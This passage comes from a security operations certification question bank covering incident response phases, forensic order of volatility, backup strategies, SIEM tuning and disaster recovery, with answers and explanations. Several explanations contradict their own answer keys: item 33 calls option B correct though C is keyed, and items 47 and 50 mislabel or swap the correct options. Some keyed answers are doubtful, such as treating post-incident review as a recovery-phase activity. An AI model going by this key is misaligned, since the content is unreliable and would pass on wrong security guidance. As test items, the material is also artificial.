Option B is wrong because developing and testing the continuity plan occurs after the BIA, using its outputs to design and validate recovery procedures; the BIA itself does not involve plan creation or testing. Option C is wrong because while RTO and RPO are derived from BIA findings, they are not the primary purpose—the BIA first identifies critical functions and dependencies, and then those metrics are calculated as part of the recovery strategy phase. Option D is wrong because creating the business continuity plan document is a separate step that synthesizes BIA results, recovery strategies, and procedures into a formal document; the BIA is an analytical input, not the document itself.

32
Multi-Selecteasy

Which THREE of the following are key activities in the recovery phase of incident response?

Select 3 answers
A.Identifying the root cause
B.Notifying law enforcement
C.Restoring systems from backups
D.Conducting post-incident review
E.Implementing containment measures
AnswersB, C, D

May be required depending on the incident.

Why this answer

Notifying law enforcement is a key activity in the recovery phase because it involves external coordination after the immediate threat is contained, ensuring legal and regulatory compliance. Recovery focuses on restoring normal operations and preserving evidence for potential prosecution, which includes contacting authorities if the incident involves criminal activity. This step is distinct from containment or eradication, as it occurs after systems are stabilized and the organization begins returning to business as usual.

Exam trap

The trap here is confusing the recovery phase with the eradication or containment phases, leading candidates to select root cause analysis (eradication) or containment measures (containment) as recovery activities, when recovery strictly involves restoring operations and post-incident documentation.

33
MCQhard

A security team is evaluating a new endpoint detection and response (EDR) solution. Which of the following capabilities is MOST important for detecting fileless malware?

A.Static malware analysis.
B.Signature-based detection.
C.Behavioral analysis and process monitoring.
D.Network traffic inspection.
AnswerC

Detects runtime behaviors like PowerShell abuse or process injection.

Why this answer

Option B is correct because behavioral analysis and process monitoring detect anomalous behavior typical of fileless malware. Signature-based detection is ineffective against fileless variants.

34
MCQeasy

According to NIST SP 800-61, which phase of incident response immediately follows detection and analysis?

A.Recovery
B.Preparation
C.Eradication
D.Containment
AnswerD

Containment immediately follows detection.

Why this answer

According to NIST SP 800-61, the incident response lifecycle consists of four phases: Preparation, Detection & Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. The phase that immediately follows Detection & Analysis is Containment, because once an incident is detected and analyzed, the priority is to limit damage and prevent further spread before eradication and recovery can be safely performed.

Exam trap

The trap here is that candidates confuse the logical order of the NIST phases, often selecting Eradication because they think removing the threat is the immediate next step, but NIST explicitly places Containment before Eradication to ensure the incident is stabilized first.

How to eliminate wrong answers

Option A is wrong because Recovery occurs after Eradication, not immediately after Detection & Analysis; it involves restoring systems to normal operation. Option B is wrong because Preparation is the initial phase that occurs before any incident, not after detection. Option C is wrong because Eradication follows Containment in the NIST framework; you must first contain the threat to prevent further damage before removing malware or compromised accounts.

35
MCQmedium

During a forensic investigation, the team needs to preserve evidence from a running server. What is the FIRST step the team should take?

A.Capture a memory dump.
B.Create a disk image.
C.Shut down the server normally.
D.Unplug the network cable.
AnswerA

Preserves volatile evidence critical for analysis.

Why this answer

The first step in a forensic investigation of a running server is to capture a memory dump because volatile data (RAM) contains critical evidence such as running processes, network connections, encryption keys, and malware that would be lost if the system is powered off or altered. Preserving this volatile state before any other action ensures that the most transient evidence is secured, following the order of volatility principle. Capturing memory first prevents irreversible loss of data that cannot be recovered from disk or network captures.

Exam trap

The trap here is that candidates often confuse the urgency of preserving volatile data with the desire to immediately isolate the system from the network, leading them to choose unplugging the network cable first, but the correct forensic priority is to capture the most volatile evidence (memory) before any network or power actions.

How to eliminate wrong answers

Option B is wrong because creating a disk image is a non-volatile data acquisition step that should occur after capturing memory, as disk imaging does not preserve volatile evidence like running processes or encryption keys. Option C is wrong because shutting down the server normally would cause the operating system to cleanly terminate processes, potentially destroying evidence such as temporary files, network connections, and memory-resident malware, and may trigger anti-forensic mechanisms. Option D is wrong because unplugging the network cable, while it may prevent remote tampering, is not the first step; it should be performed after memory capture to avoid disrupting network-based evidence (e.g., active connections, network traffic logs) that could be captured from memory first.

36
MCQeasy

During a security audit, an organization discovers that several employees are sharing a single generic account to access a critical database. Which principle of security operations is being violated?

A.Accountability
B.Separation of duties
C.Defense in depth
D.Least privilege
AnswerA

Account sharing removes the ability to trace actions to an individual, violating accountability.

Why this answer

Accountability requires that each individual user be uniquely identified and their actions traceable. Sharing a generic account breaks this chain because the audit logs cannot attribute specific database operations (e.g., SELECT, UPDATE, DELETE) to a particular employee, making it impossible to hold anyone responsible for misuse or errors.

Exam trap

The trap here is that candidates confuse the lack of individual accountability with the principle of least privilege, assuming that sharing a generic account automatically means excessive permissions, when the real violation is the inability to uniquely identify and trace user actions.

How to eliminate wrong answers

Option B is wrong because separation of duty involves splitting critical tasks among multiple people to prevent fraud (e.g., requiring two different users to authorize and execute a transaction), which is not directly violated by shared accounts. Option C is wrong because defense in depth is a layered security strategy (e.g., firewalls, IDS, encryption) that remains intact even if a single account is shared; the violation here is about identity and audit, not defense layers. Option D is wrong because least privilege restricts users to the minimum permissions needed for their role; while shared accounts may also have excessive privileges, the core violation in this scenario is the inability to attribute actions to individuals, not the level of access rights.

37
MCQmedium

An organization is implementing a new backup strategy for its critical servers. The backup must support rapid restoration of individual files and allow for a recovery point objective (RPO) of no more than 15 minutes. Which backup method should be used for daily operations?

A.Full backup every 24 hours
B.Continuous data protection (CDP)
C.Differential backup every 6 hours
D.Incremental backup every 4 hours
AnswerB

CDP captures every write, enabling restoration to any point within seconds, meeting the RPO.

Why this answer

Continuous data protection (CDP) is the only backup method that can guarantee a recovery point objective (RPO) of 15 minutes or less because it captures every write to disk in real time or near-real time, enabling restoration to any point within the protection window. Full, differential, and incremental backups all rely on periodic snapshots, which inherently introduce gaps that exceed a 15-minute RPO unless the interval is shorter than 15 minutes, which is impractical for daily operations.

Exam trap

The trap here is that candidates may confuse the backup method's recovery time objective (RTO) with the recovery point objective (RPO), or assume that frequent incremental backups (e.g., every 4 hours) can achieve a 15-minute RPO, but the RPO is determined by the backup interval, not the method's efficiency.

How to eliminate wrong answers

Option A is wrong because a full backup every 24 hours provides an RPO of up to 24 hours, far exceeding the 15-minute requirement. Option C is wrong because a differential backup every 6 hours still leaves up to 6 hours of potential data loss between backups. Option D is wrong because an incremental backup every 4 hours results in an RPO of up to 4 hours, which does not meet the 15-minute threshold.

38
MCQmedium

A healthcare organization is implementing a new SIEM solution to centralize log management from its network devices, servers, and applications. The compliance team requires that all logs be retained for at least one year to meet HIPAA regulations. The SIEM platform has limited storage capacity and uses a hot/warm/cold tier architecture. The system currently ingests about 500 GB of logs per day. The security team wants to ensure that critical logs (e.g., authentication failures, privilege escalations) remain immediately searchable for at least 90 days, while less critical logs can be moved to cheaper storage after 30 days. What is the most cost-effective storage strategy that meets all requirements?

A.Store all logs in hot storage for 90 days, then archive to cold storage indefinitely.
B.Store only critical logs in hot storage for 1 year, delete non-critical logs after 30 days.
C.Store all logs in hot storage for 30 days, then delete them after 90 days.
D.Store critical logs in hot storage for 90 days, then move all logs to warm/cold storage for the remainder of the year.
AnswerD

Meets both immediate searchability and long-term retention cost-effectively.

Why this answer

Option D is correct because it aligns the SIEM's hot/warm/cold tier architecture with the organization's retention and searchability requirements. Critical logs remain in hot storage for 90 days for immediate searching, then all logs are moved to cheaper warm/cold storage for the remaining 275 days to meet the one-year HIPAA retention mandate. This balances cost efficiency with compliance, avoiding unnecessary hot storage costs for non-critical logs beyond 30 days.

Exam trap

The trap here is that candidates assume all logs must be treated identically or that compliance allows deletion of non-critical logs, but HIPAA requires retention of all logs for one year, and tiered storage allows cost-effective compliance by separating searchability from retention duration.

How to eliminate wrong answers

Option A is wrong because storing all logs in hot storage for 90 days wastes resources on non-critical logs that only need 30 days of hot retention, and archiving indefinitely after 90 days may exceed the one-year retention requirement without cost optimization. Option B is wrong because deleting non-critical logs after 30 days violates HIPAA's one-year retention requirement for all logs, not just critical ones. Option C is wrong because deleting all logs after 90 days fails the one-year retention mandate entirely, and storing all logs in hot storage for 30 days is inefficient for critical logs that need 90 days of immediate searchability.

39
MCQhard

Refer to the exhibit. What is the security risk of this S3 bucket policy?

A.It only allows read from a specific IP
B.It allows public read access to all objects
C.It denies all access
D.It allows any IP to write objects
AnswerD

PutObject has no IP restriction.

Why this answer

The S3 bucket policy in the exhibit grants `s3:PutObject` permission to `Principal: *` (anyone) without any condition restricting the source IP. This means any unauthenticated user on the internet can upload objects to the bucket, leading to potential data corruption, storage cost abuse, or malware hosting. Option D correctly identifies this risk because the policy allows any IP to write objects.

Exam trap

The trap here is that candidates focus on the obvious public read access (Option B) and overlook the more dangerous public write permission, which is the primary security risk in this policy.

How to eliminate wrong answers

Option A is wrong because the policy does not restrict read access to a specific IP; it grants `s3:GetObject` to `Principal: *` with no IP condition, making it publicly readable from any IP. Option B is wrong because while the policy does allow public read access, the question asks for the security risk, and the more severe risk is the unrestricted write permission (PutObject) that can lead to data injection or abuse. Option C is wrong because the policy explicitly allows both read and write actions, so it does not deny all access.

40
MCQhard

In a virtualized environment, which security control is most effective for isolating VMs from each other?

A.Host-based firewall on each VM
B.Physical separation
C.Virtual LAN (VLAN) segmentation
D.Hypervisor-level network policies
AnswerD

Enforced by hypervisor, most effective for isolation.

Why this answer

Hypervisor-level network policies, such as virtual switches with port groups and VLAN tagging, enforce isolation directly at the hypervisor layer, ensuring that VM traffic is segmented without relying on guest OS configurations. This control is independent of the VM's own firewall settings and can prevent lateral movement even if a VM is compromised, because the hypervisor mediates all network I/O.

Exam trap

The trap here is that candidates often confuse VLAN segmentation (Option C) as the primary isolation mechanism, but in a virtualized environment, VLANs are configured at the hypervisor level as part of virtual switch policies, making 'Hypervisor-level network policies' the more precise and encompassing answer.

How to eliminate wrong answers

Option A is wrong because a host-based firewall on each VM relies on the guest OS, which can be bypassed if the VM is compromised or if the firewall is misconfigured; it does not provide isolation at the hypervisor level. Option B is wrong because physical separation defeats the purpose of virtualization and is not a practical control within a virtualized environment; it refers to separate physical hosts, not VM-to-VM isolation. Option C is wrong because VLAN segmentation operates at Layer 2 of the network and can be effective, but it is configured on physical switches and does not inherently control traffic between VMs on the same hypervisor unless combined with hypervisor-level policies; it is an external control that can be bypassed if the hypervisor's virtual switch is not properly configured.

41
MCQmedium

A security team is reviewing firewall logs and sees many dropped packets from an external IP. What type of attack is most likely?

A.Man-in-the-middle
B.Port scanning
C.SQL injection
D.Phishing
AnswerB

Multiple dropped packets suggest scanning for open ports.

Why this answer

Port scanning is the most likely attack because it involves an external IP sending packets to multiple ports on a target system to identify open services. Firewalls log these as dropped packets when they block unsolicited inbound traffic to closed or filtered ports, which is a common signature of reconnaissance activity.

Exam trap

The trap here is that candidates may confuse port scanning with a denial-of-service (DoS) attack, but port scanning is reconnaissance, not resource exhaustion, and the key clue is the pattern of dropped packets to multiple ports from a single IP.

How to eliminate wrong answers

Option A is wrong because a man-in-the-middle attack requires the attacker to intercept and potentially modify communications between two parties, which would not typically manifest as dropped packets from a single external IP; instead, it involves ARP spoofing, DNS poisoning, or session hijacking. Option C is wrong because SQL injection targets web application input fields to manipulate database queries, not network-layer packet filtering, and would not appear as dropped packets in firewall logs. Option D is wrong because phishing is a social engineering attack that uses deceptive emails or websites to steal credentials, not a network-level activity that generates dropped packets from an external IP.

42
MCQmedium

Refer to the exhibit. The ACL is applied inbound on a perimeter router. A security analyst notices that web traffic to an internal server is being blocked. What is the most likely cause?

A.The connection is stateful and not returning traffic
B.The source address is not permitted
C.The ACL is applied outbound incorrectly
D.The web server is using a port other than 80 or 443
AnswerD

Only ports 80 and 443 are allowed for TCP.

Why this answer

Option D is correct because the ACL is applied inbound on the perimeter router, meaning it inspects traffic as it enters the interface. If the web server is using a non-standard port (e.g., 8080 or 8443) instead of the well-known ports 80 or 443, the ACL will not match the permit statement for HTTP/HTTPS traffic, causing the packets to be dropped by the implicit deny any at the end of the ACL. This is a common misconfiguration when administrators assume all web traffic uses default ports.

Exam trap

ISC2 often tests the misconception that all web traffic uses ports 80 or 443, leading candidates to overlook the possibility of non-standard port configurations, while also distracting with stateful vs. stateless ACL behavior.

How to eliminate wrong answers

Option A is wrong because standard ACLs are stateless and do not track connection state; stateful inspection requires a firewall or reflexive ACL, not a standard inbound ACL on a router. Option B is wrong because the source address is likely permitted (the analyst sees web traffic being blocked, not all traffic), and the ACL would explicitly deny or permit based on source IP; if the source were not permitted, the traffic would be blocked entirely, not just web traffic. Option C is wrong because the ACL is explicitly stated as applied inbound, not outbound; applying it outbound would affect traffic leaving the interface, not incoming web requests to the internal server.

43
MCQmedium

A company is deploying a new web application and needs to ensure that only HTTPS traffic is allowed. What is the MOST effective way to enforce this at the network perimeter?

A.Allow TCP port 443 only and block port 80.
B.Configure the firewall to allow TCP port 80 and 443.
C.Use a proxy server to decrypt all traffic.
D.Block TCP port 443.
AnswerA

Only allows HTTPS, rejecting all HTTP connections.

Why this answer

Blocking TCP port 80 and allowing only TCP port 443 at the network perimeter ensures that only HTTPS traffic can enter or leave the network. This is the most effective method because it directly enforces the protocol restriction at the firewall, preventing any HTTP traffic from bypassing encryption. Allowing both ports would permit unencrypted HTTP, while using a proxy or blocking port 443 would either add unnecessary complexity or deny legitimate HTTPS traffic.

Exam trap

The trap here is that candidates may think allowing both ports 80 and 443 is acceptable for flexibility, but the question explicitly requires only HTTPS, so blocking port 80 is essential to enforce encryption at the perimeter.

How to eliminate wrong answers

Option B is wrong because allowing both TCP port 80 and 443 permits unencrypted HTTP traffic, which violates the requirement to allow only HTTPS. Option C is wrong because using a proxy server to decrypt all traffic does not enforce the restriction at the network perimeter; it adds overhead and may introduce privacy or compliance issues, and it does not block port 80 by itself. Option D is wrong because blocking TCP port 443 would deny all HTTPS traffic, which is the opposite of the requirement to allow only HTTPS.

44
MCQmedium

An organization is required to retain audit logs for seven years due to regulatory compliance. The logs are currently stored on a file server that is approaching capacity. What is the BEST way to manage log storage?

A.Reduce the logging level to generate less data.
B.Delete logs older than one year.
C.Increase the frequency of log rotation.
D.Compress logs and move them to low-cost archival storage.
AnswerD

Reduces storage footprint and complies with retention.

Why this answer

Option D is correct because it balances the seven-year retention requirement with storage constraints by compressing logs (reducing size) and moving them to low-cost archival storage (e.g., cold storage or tape). This preserves data integrity and accessibility for compliance audits while freeing up space on the primary file server.

Exam trap

The trap here is that candidates may confuse operational efficiency (log rotation) with long-term retention, failing to recognize that compliance mandates absolute retention periods that cannot be circumvented by deletion or reduced logging.

How to eliminate wrong answers

Option A is wrong because reducing the logging level would omit critical security events, violating the principle of complete audit trails and potentially failing compliance requirements. Option B is wrong because deleting logs older than one year directly violates the seven-year retention mandate, exposing the organization to regulatory penalties. Option C is wrong because increasing log rotation frequency merely creates more files without addressing the underlying capacity issue; it does not reduce total data volume or extend retention capabilities.

45
MCQeasy

A company's security policy requires that all removable media be encrypted. An employee plugs in a USB drive and is prompted to format it before use. After formatting, the drive is not encrypted. What is the most likely reason?

A.The employee did not enable encryption (e.g., BitLocker To Go) after formatting
B.The USB drive hardware does not support encryption
C.The operating system does not support encryption of removable media
D.The employee used the wrong file system (FAT32 vs NTFS)
AnswerA

Encryption is a separate step that must be explicitly enabled, e.g., via BitLocker To Go.

Why this answer

Option A is correct because BitLocker To Go, the native encryption feature for removable drives in Windows, is not automatically enabled when a USB drive is formatted. The employee must explicitly enable encryption (e.g., via BitLocker To Go in Control Panel or by right-clicking the drive and selecting 'Turn on BitLocker') after formatting. Without this step, the drive remains unencrypted, violating the security policy.

Exam trap

The trap here is that candidates assume formatting a drive automatically applies encryption (e.g., thinking BitLocker is enabled by default), when in fact encryption must be explicitly activated after formatting.

How to eliminate wrong answers

Option B is wrong because modern USB drives, even basic ones, support encryption at the software level (e.g., BitLocker To Go) regardless of hardware encryption capabilities; the policy requires encryption, which can be achieved via software. Option C is wrong because Windows (the most common OS for such scenarios) fully supports encryption of removable media via BitLocker To Go, which is available in Pro, Enterprise, and Education editions. Option D is wrong because the file system (FAT32 vs NTFS) does not determine encryption; BitLocker To Go works with both, though NTFS is recommended for full feature support, and the lack of encryption is due to the employee not enabling it, not the file system choice.

46
Multi-Selectmedium

Which TWO of the following are effective methods for detecting unauthorized access to a network? (Choose two.)

Select 2 answers
A.Vulnerability scanner
B.Antivirus software
C.Security information and event management (SIEM)
D.Firewall rule review
E.Intrusion detection system (IDS)
AnswersC, E

Correlates logs from multiple sources to detect incidents.

Why this answer

A SIEM aggregates and correlates logs from multiple sources (e.g., firewalls, servers, IDS) in real time, enabling detection of anomalous patterns indicative of unauthorized access. It provides centralized visibility and alerting that can identify a breach even when individual logs appear benign.

Exam trap

The trap here is that candidates confuse vulnerability scanning (proactive) with intrusion detection (reactive), or assume antivirus covers network-level threats, when in fact neither provides real-time monitoring of network access attempts.

47
Multi-Selecteasy

Which TWO of the following are key elements of a disaster recovery plan (DRP)?

Select 2 answers
A.Communication and notification procedures
B.Standard operating procedures for daily tasks
C.Patch management schedules
D.Recovery priorities and order of restoration
E.Business impact analysis (BIA) results
AnswersA, D

Essential for coordinating recovery.

Why this answer

A and D are correct. A is correct because a DRP must include communication procedures to notify stakeholders. D is correct because the DRP should outline the order in which systems are restored (recovery priorities).

B is incorrect because the BIA itself is separate, though its outputs inform the DRP. C is incorrect because the DRP is not focused on daily operations but on recovery. E is incorrect because patch management is part of ongoing maintenance.

48
MCQmedium

During an incident, a forensic analyst needs to preserve volatile data from a live Windows server. Which command should be used first to collect memory and network connection information?

A.Run ipconfig /all
B.Run tasklist /v
C.Use a forensic tool to capture the contents of RAM
D.Perform a clean shutdown
AnswerC

Memory is the most volatile data.

Why this answer

Option C is correct because volatile data, such as the contents of RAM, is lost when the system is powered off. Capturing RAM first preserves critical evidence like running processes, network connections, and encryption keys. Network connection information can be extracted from the memory dump, so a dedicated forensic tool (e.g., FTK Imager, WinPmem) is the priority before any command-line queries that alter system state.

Exam trap

The trap here is that candidates often choose ipconfig or tasklist because they are familiar Windows commands, but they fail to recognize that these commands do not capture the most volatile data (RAM) and can alter the system state, violating the order of volatility.

How to eliminate wrong answers

Option A is wrong because ipconfig /all only displays static network configuration (IP addresses, DNS servers) and does not capture volatile memory or active network connections; it also modifies the system state minimally but is not the first priority. Option B is wrong because tasklist /v lists running processes but does not capture memory contents or network connections, and it can alter the state of the system by interacting with the process list. Option D is wrong because performing a clean shutdown destroys all volatile data in RAM, including network connections and process information, which is the opposite of preservation.

49
MCQmedium

Refer to the exhibit. What type of attack is indicated by the logs?

A.Malware infection
B.Privilege escalation
C.Denial of service
D.Brute force attack on root
AnswerD

Multiple failed root logins from same IP.

Why this answer

The logs show repeated SSH authentication attempts with the username 'root' from the same source IP, incrementing the failed password count until success is recorded. This pattern of sequential login attempts against a single privileged account is the hallmark of a brute force attack targeting the root user.

Exam trap

The trap here is that candidates may confuse a brute force attack with a denial of service because repeated failed logins can appear to 'overwhelm' the authentication system, but the key differentiator is the intent and pattern—guessing credentials versus exhausting resources.

How to eliminate wrong answers

Option A is wrong because malware infection would typically show indicators like file downloads, unusual process execution, or outbound connections to command-and-control servers, not repeated authentication attempts. Option B is wrong because privilege escalation involves an authenticated user gaining higher privileges than authorized, whereas these logs show failed logins before any successful authentication occurs. Option C is wrong because a denial of service attack would aim to overwhelm the service or system, not systematically attempt to guess credentials; the logs show normal SSH session establishment and teardown, not resource exhaustion.

50
Multi-Selectmedium

Which TWO of the following are key principles for designing an effective Security Operations Center (SOC)?

Select 2 answers
A.Applying least privilege to all user accounts
B.Ensuring separation of duties among analysts
C.Using defense-in-depth strategies across layers
D.Automating routine investigation tasks
E.Implementing centralized logging for all devices
AnswersB, C

Separation of duties prevents conflict of interest and reduces collusion risk.

Why this answer

Option B (Separation of duties) and Option D (Defense in depth) are correct because they reduce risk of single points of failure and provide layered security. Option A (Centralized logging) is important but not a principle per se; Option C (Least privilege) is a separate concept; Option E (Automation) is a tactic, not a core principle.

51
Multi-Selectmedium

Which THREE of the following are valid methods for securely disposing of magnetic hard drives?

Select 3 answers
A.Deleting files and emptying recycle bin
B.Physical shredding
C.Overwriting with random data (multiple passes)
D.Degaussing
E.Quick formatting
AnswersB, C, D

Destroys platters.

Why this answer

Physical shredding (B) destroys the platters, making data recovery impossible regardless of the magnetic state. This is a valid method for secure disposal because it physically prevents any read/write head from accessing the data.

Exam trap

The trap here is that candidates often confuse logical deletion (A, E) with secure erasure, or assume that multiple overwrites are always required, when in fact degaussing and physical destruction are the only methods that guarantee data is irrecoverable from magnetic media.

52
MCQhard

An organization's backup strategy includes daily full backups and hourly incremental backups. The system suffers a ransomware attack that encrypts all data. Which backup set is essential to restore the most recent clean state?

A.The last full backup plus all incremental backups after that
B.The last full backup plus the last incremental backup
C.The last full backup only
D.The last incremental backup only
AnswerA

Provides the most recent clean state by applying all increments.

Why this answer

To restore the most recent clean state after a ransomware attack, you need the last full backup as the base and all subsequent incremental backups to apply every change made up to the moment before the attack. Incremental backups capture only data changed since the last backup (full or incremental), so skipping any breaks the chain and results in data loss. Option A correctly includes the full backup and every incremental backup after it, ensuring a complete restoration to the latest point before encryption.

Exam trap

The trap here is that candidates confuse incremental backups with differential backups, mistakenly thinking only the last incremental is needed, when in fact incremental backups require the entire chain from the last full backup to restore completely.

How to eliminate wrong answers

Option B is wrong because it omits all intermediate incremental backups between the last full and the last incremental, which would leave the restored data missing changes from those skipped intervals, resulting in an incomplete state. Option C is wrong because a full backup alone restores only the data as of its creation time, losing all changes made by subsequent hourly increments, which is far from the most recent clean state. Option D is wrong because an incremental backup contains only changes since the last backup and cannot be restored without its base full backup and all prior increments in the chain; applying it alone would fail due to missing parent data.

53
MCQhard

An organization uses a siem to collect logs from multiple sources. The security team notices that some events are missing during peak traffic hours. Analysis shows that the log sources are sending data via UDP. What is the most likely cause?

A.Clock skew between sources and SIEM
B.Insufficient SIEM storage capacity
C.UDP packet loss
D.Network bandwidth saturation
AnswerC

UDP does not guarantee delivery; packets can be lost.

Why this answer

UDP is a connectionless, best-effort transport protocol that does not guarantee delivery. During peak traffic hours, network congestion can cause UDP datagrams to be dropped without any retransmission mechanism, leading to missing events in the SIEM. This is the most direct and likely cause given the scenario.

Exam trap

The trap here is that candidates may incorrectly attribute missing events to storage or bandwidth issues, but the question specifically highlights UDP as the transport, which directly implies packet loss due to the protocol's lack of reliability.

How to eliminate wrong answers

Option A is wrong because clock skew would cause timestamp misalignment, not event loss; NTP synchronization is the standard remedy. Option B is wrong because insufficient SIEM storage would cause older data to be rotated out or ingestion to stop, not selective loss during peak hours. Option D is wrong because network bandwidth saturation could cause packet loss, but the specific mention of UDP points to the protocol's lack of reliability as the root cause; bandwidth saturation alone would affect TCP and UDP equally, but TCP would retransmit lost segments.

54
MCQhard

An organization with 500 employees operates a hybrid infrastructure with on-premises Active Directory and cloud-based services (Office 365, Azure). The security team receives an alert from the SIEM showing a high number of failed login attempts for a service account named 'svc_backup' from an external IP address. The account has delegated permissions to back up all domain controllers. The attempts are ongoing and fall below the lockout threshold to avoid detection. The team suspects a targeted password spraying attack. The helpdesk reports no recent password changes for this account. The incident response plan requires containment within 15 minutes. The cloud services are integrated with AD via Azure AD Connect. Which of the following actions BEST contains the attack while minimizing operational impact?

A.Block the external IP address at the firewall.
B.Configure Azure AD Conditional Access to require MFA for the account.
C.Disable the svc_backup account in Active Directory and notify the backup team to use an alternate account.
D.Immediately change the password of the svc_backup account.
AnswerC

Directly stops all authentication attempts; least operational impact until a secure replacement is created.

Why this answer

Option C is correct because disabling the compromised service account in Active Directory immediately stops the ongoing password spraying attack, preventing further unauthorized access attempts. This action contains the threat within the 15-minute containment window while minimizing operational impact, as the backup team can switch to an alternate account without disrupting critical backup operations. Disabling the account is faster and more reliable than changing the password, which might not propagate immediately to all domain controllers and cloud services via Azure AD Connect.

Exam trap

The trap here is that candidates may choose to change the password (Option D) thinking it is the fastest containment action, but they overlook the synchronization delay in hybrid environments and the risk of breaking automated processes, whereas disabling the account is the definitive containment step per incident response best practices.

How to eliminate wrong answers

Option A is wrong because blocking the external IP address at the firewall is a temporary measure that does not address the root cause; the attacker can easily switch to a different IP address or proxy, and the compromised account remains active and vulnerable. Option B is wrong because configuring Azure AD Conditional Access to require MFA for the account does not stop the ongoing attack against on-premises Active Directory; the password spraying attempts are targeting the on-premises service account, not cloud authentication, and MFA enforcement would not apply to NTLM or Kerberos authentication used for backup operations. Option D is wrong because immediately changing the password may not propagate quickly enough to all domain controllers and Azure AD via Azure AD Connect (which synchronizes every 30 minutes by default), leaving a window for the attacker to continue; additionally, changing the password could break automated backup scripts that rely on the current password, causing operational disruption.

55
MCQhard

A security analyst observes repeated failed logon attempts from a single IP address against a domain controller. The account lockout policy is set to 5 attempts within 30 minutes. However, after the account is locked, the attack switches to a different username. Which type of attack is most likely occurring?

A.Password spraying attack
B.Brute-force attack
C.Dictionary attack
D.Rainbow table attack
AnswerA

Password spraying tries common passwords across many accounts.

Why this answer

This is a password spraying attack because the attacker attempts a small set of common passwords against many usernames, avoiding account lockout by not exceeding the threshold for any single account. The observed behavior—repeated failed attempts from one IP, then switching usernames after lockout—matches the pattern of password spraying, where the attacker tries one or a few passwords across many accounts rather than many passwords against one account.

Exam trap

The trap here is that candidates confuse password spraying with brute-force or dictionary attacks, failing to recognize that the key differentiator is the attacker's strategy of targeting multiple usernames with a few passwords to evade account lockout thresholds.

How to eliminate wrong answers

Option B (Brute-force attack) is wrong because a brute-force attack tries many passwords against a single username, which would quickly trigger the account lockout policy and not involve switching usernames. Option C (Dictionary attack) is wrong because a dictionary attack uses a list of likely passwords against a single account, again focusing on one username and leading to lockout, not switching targets. Option D (Rainbow table attack) is wrong because rainbow tables are used to crack password hashes offline, not for online authentication attempts against a live domain controller.

56
Multi-Selecthard

Which TWO of the following are essential components of a successful security awareness program?

Select 2 answers
A.Metrics to measure the program's effectiveness
B.Implementation of technical controls like antivirus
C.Annual one-time training sessions
D.Punitive measures for security violations
E.Regular, engaging, and role-specific training
AnswersA, E

Measuring outcomes (e.g., phishing test results) allows refinement of the program.

Why this answer

Metrics to measure the program's effectiveness (Option A) are essential because they provide quantifiable data—such as phishing click rates, incident reporting trends, and policy violation statistics—that allow the organization to evaluate whether the awareness program is changing behavior and reducing risk. Without metrics, the program cannot be improved or justified to stakeholders, making it a core component of a successful security awareness initiative.

Exam trap

ISC2 often tests the misconception that technical controls or punitive measures are part of a security awareness program, when in fact the program is purely about human-focused education and behavior change, not technology enforcement or punishment.

57
Multi-Selectmedium

Which TWO of the following are essential components of a disaster recovery plan? (Choose two.)

Select 2 answers
A.Recovery Point Objective (RPO)
B.Business continuity plan
C.Recovery Time Objective (RTO)
D.Service Level Agreement (SLA)
E.Cold site configuration
AnswersA, C

Defines acceptable data loss in terms of time.

Why this answer

Options A and C are correct. Recovery Time Objective (RTO) and Recovery Point Objective (RPO) are key metrics. Business continuity plan is a separate but related plan; cold sites and SLAs are not components of a DRP itself.

58
MCQeasy

Which of the following is a primary purpose of conducting a tabletop exercise for incident response?

A.Measure the effectiveness of backup restoration.
B.Validate communication and decision-making processes.
C.Test technical capabilities of security tools.
D.Identify unpatched vulnerabilities in systems.
AnswerB

Focuses on team coordination and escalation paths.

Why this answer

A tabletop exercise is a discussion-based session where participants walk through a simulated incident scenario to evaluate the effectiveness of communication channels, decision-making hierarchies, and coordination among stakeholders. It does not involve live systems or technical testing, so its primary purpose is to validate the procedural and human elements of the incident response plan, such as who notifies whom and how escalation decisions are made.

Exam trap

The trap here is that candidates confuse a tabletop exercise with a technical drill or live-fire exercise, mistakenly thinking it tests tool capabilities or system-level actions, when in fact it strictly evaluates human processes and communication workflows.

How to eliminate wrong answers

Option A is wrong because measuring backup restoration effectiveness requires a hands-on technical test (e.g., a recovery drill or restore validation), not a discussion-based tabletop exercise. Option C is wrong because testing technical capabilities of security tools (e.g., SIEM rule tuning or firewall ACLs) demands live execution or simulation in a lab environment, not a walkthrough. Option D is wrong because identifying unpatched vulnerabilities is the domain of vulnerability scanning (e.g., using Nessus or OpenVAS) or penetration testing, not a tabletop exercise which focuses on process and communication.

59
MCQmedium

A security analyst notices that the SIEM is generating an overwhelming number of low-priority alerts from a single application server. The server is critical to operations. What is the BEST approach to reduce noise without compromising security?

A.Increase the severity threshold for that server's alerts.
B.Disable all alerts from that server.
C.Create a suppression rule for known benign patterns.
D.Exclude the server from SIEM monitoring.
AnswerC

Suppresses known benign events while keeping alerting for unusual activity.

Why this answer

Option C is correct because suppression rules allow the SIEM to filter out known benign patterns (e.g., routine service checks or scheduled scans) while still capturing genuine threats. This reduces alert fatigue without disabling monitoring for the critical server, preserving visibility into anomalous or malicious activity.

Exam trap

The trap here is that candidates confuse 'reducing noise' with 'reducing monitoring,' leading them to choose threshold increases or outright exclusion, when the correct approach is to surgically filter known benign events while maintaining full detection coverage.

How to eliminate wrong answers

Option A is wrong because increasing the severity threshold would cause the SIEM to ignore all low-severity alerts, potentially missing early indicators of compromise (e.g., reconnaissance or privilege escalation attempts) that often start as low-priority events. Option B is wrong because disabling all alerts from a critical server creates a complete blind spot, violating the principle of defense in depth and allowing attacks to go undetected. Option D is wrong because excluding the server from SIEM monitoring removes all visibility into its security posture, which is unacceptable for a critical asset and contradicts the core purpose of a SIEM.

60
MCQhard

Your organization, a multinational e-commerce company, has suffered a ransomware attack that encrypted critical database servers and file shares. The ransom note demands payment in cryptocurrency within 48 hours or the data will be permanently destroyed. The company has a backup strategy that includes daily full backups and hourly incremental backups, stored both on-site and off-site. However, during the incident response, you discover that the most recent on-site backups are also encrypted because the backup server was connected to the network and affected by the same ransomware. Off-site backups are on tape and were last rotated out 72 hours ago. The CEO is pressuring to pay the ransom to restore operations quickly. Which option should the incident response team prioritize to minimize data loss and reputational damage?

A.Pay the ransom and hope the attackers provide a working decryption key.
B.Restore data from the off-site tape backups taken 72 hours ago.
C.Rebuild servers from scratch using latest known good configurations without restoring data.
D.Attempt to negotiate with the attackers for a lower ransom and more time.
AnswerB

Off-site backups are isolated and not encrypted; 72-hour data loss is acceptable compared to paying ransom.

Why this answer

